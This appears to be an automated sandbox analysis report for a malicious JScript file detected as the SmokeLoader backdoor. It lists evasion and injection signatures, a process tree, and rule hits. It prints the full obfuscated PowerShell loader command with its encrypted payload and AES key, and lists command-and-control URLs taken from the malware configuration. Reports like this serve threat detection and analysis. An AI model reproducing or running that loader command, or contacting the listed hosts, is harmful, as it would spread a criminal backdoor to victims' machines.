Edit tour
Windows
Analysis Report
#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.js
Overview
General Information
| Sample name: | #U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U0414#U043e#U0433#U043e#U0432i#U0440.jsrenamed because original name is a hash value |
| Original sample name: | -i i.js |
| Analysis ID: | 1577215 |
| MD5: | f0f21a53585ee70adbe6004636da53f4 |
| SHA1: | 8123ab7729d5c1a339af4e5f6c93b68e1acdfaf4 |
| SHA256: | 292bda20c71cc52f49c84f40160d5747ed2c6ab24ce7a027d2808888438b93a6 |
| Infos: |   |
 | |
Detection
SmokeLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 5512 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\#U042 1#U043a#U0 430#U043d- #U043a#U04 3e#U043fi# U044f #U04 14#U043e#U 0433#U043e #U0432i#U0 440.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 4540 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction YYjd ($AhlAc){r eturn -spl it ($AhlAc -replace '..', '0x$ & ')};$KPw C = YYjd(' 9626AC9CA1 1F87600DA3 D4D6512002 C7DBD2692A 7FD524BB4F D120B8703E 62B78823EC 832238DD15 18E4463172 663BB7581F 6638A4DB36 633FD4587E ACB1F6E927 83B536B003 3981A9BBB7 B3820BBB66 2B2DEEBB46 C45FDA2075 8EFD8966EE 737A4FFE51 B0B05B720A D71E578EF1 CDD1C5D079 B0871D75CA 28175427ED 824C17AE20 5EB3D16B2C B56DBE2EEF 7CD9B26A80 A26195C5A4 212C391BE6 FA8471B32E 1FECC1A8AB 39510DC769 DFF298CAF9 94FD115AC6 D93557D0C2 ADC21BEA84 9D901B562C 394F376197 052590BA05 267E31E9F7 A737740706 C07FEB1A99 508B4DAB29 313E964150 58C85F2882 7900D80E5D 145B64CD02 FCD51C7880 852E1C4DFB F891DC5482 A7B37E5BD8 C81C2DFC9F CD49AE7D70 55FCA9A572 28762073D8 0AB71A7A99 E8E21A8BE8 B7B66C00A9 D1192A801A 2D026D3D7D 5C22467949 B4555D9370 AA40B4FA9A 3A2BA54F4D C8CEF82795 5BA500A1F5 547EC70CBB 8F8B0ED68F CF3402F7E7 4AE0A1912A 6903222DB9 BB5BA07AC2 CC865B4770 BFEB2AE192 9DDA9E6F2B 18934C8790 DBC2A20E26 17C410434B C21BC5EC2F ACED22799A 39CEDE8A16 C040DA945A C83B21A48D 1EF157A3FF 92A7B4C17B 44BFBF9361 3067297750 78D6ABF102 5EC18617C0 409B64FC7A 378CD9EFC0 B2EB21A213 221986A49A D0D6E7B082 10CF163B19 B73128352A 80894F065C DC9B095DB8 513360C157 D95D4AD51D A58BDC71AA FA4E8F8BBD 2A07BE25F3 E32A4D5337 B04B3C8D8E 8855946E1D 6B0C403E07 B4E3B937C6 615DE84891 7188BD1DCE 38F70A40CD A365782300 D6E5D5EED0 DAA2C5C600 F336667223 9898766852 527C4283B3 DA965F9A86 F861214192 089A34C1CE 5380EE7D6E 0F386E7441 19906B947C 7758BB4D7B 8A325C6065 3292B6C08C 97385DDC4F 7F5AB31EAE 51E4F906F9 D17C398E25 2EEA055477 54176EF723 FDBD120525 A42AC182E5 EB4B575DBB FA9C5A4680 28141761CE EC0A322566 5EF3C6B846 22C514A2DC A8516179C4 F22D4B9C04 F7856080B6 F50F14FFCA CC0D37A5DC B8B05A8617 48AA499BE5 ADBAEF60DA A641DC3547 F92E711E7D 70DF4FF551 B3D81D829F 09839D1E7B 12264274B3 4EC2BB7367 71ED9B7D5B 2DD00090DF E4C97D6C76 84F6B22749 06AFDB0357 F7F48B7B50 440E3B5A6F F709B75819 16322D76ED 40C4967464 5626922643 643DD0E895 24AD181168 7A9C7C8A93 CDD6C520CF CDF9687421 22C005D2F8 128AD8A2FA B7F5D8FE45 ');$ajka=- join [char []](([Secu rity.Crypt ography.Ae s]::Create ()).Create Decryptor( (YYjd('514 E694341537 7495663787 95955644F' )),[byte[] ]::new(16) ).Transfor mFinalBloc k($KPwC,0, $KPwC.Leng th)); & $a jka.Substr ing(0,3) $ ajka.Subst ring(3) MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 1388 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
Acrobat.exe (PID: 7288 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\R oaming\inv oce.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 7460 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7720 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 96 --field -trial-han dle=1740,i ,761169781 2648605537 ,397310454 7024125911 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) 
putty.exe (PID: 8072 cmdline: "C:\Users\ user\AppDa ta\Roaming \putty.exe " MD5: C09AA26230A2083DA9032866FD33703D) 
explorer.exe (PID: 2592 cmdline: C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
svchost.exe (PID: 7540 cmdline: C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- therfaa (PID: 4252 cmdline:
C:\Users\u ser\AppDat a\Roaming\ therfaa MD5: C09AA26230A2083DA9032866FD33703D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| Windows_Trojan_Smokeloader_3687686f | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| Click to see the 10 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Click to see the 1 entries | ||||
System Summary |   |
|---|
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: frack113: | ||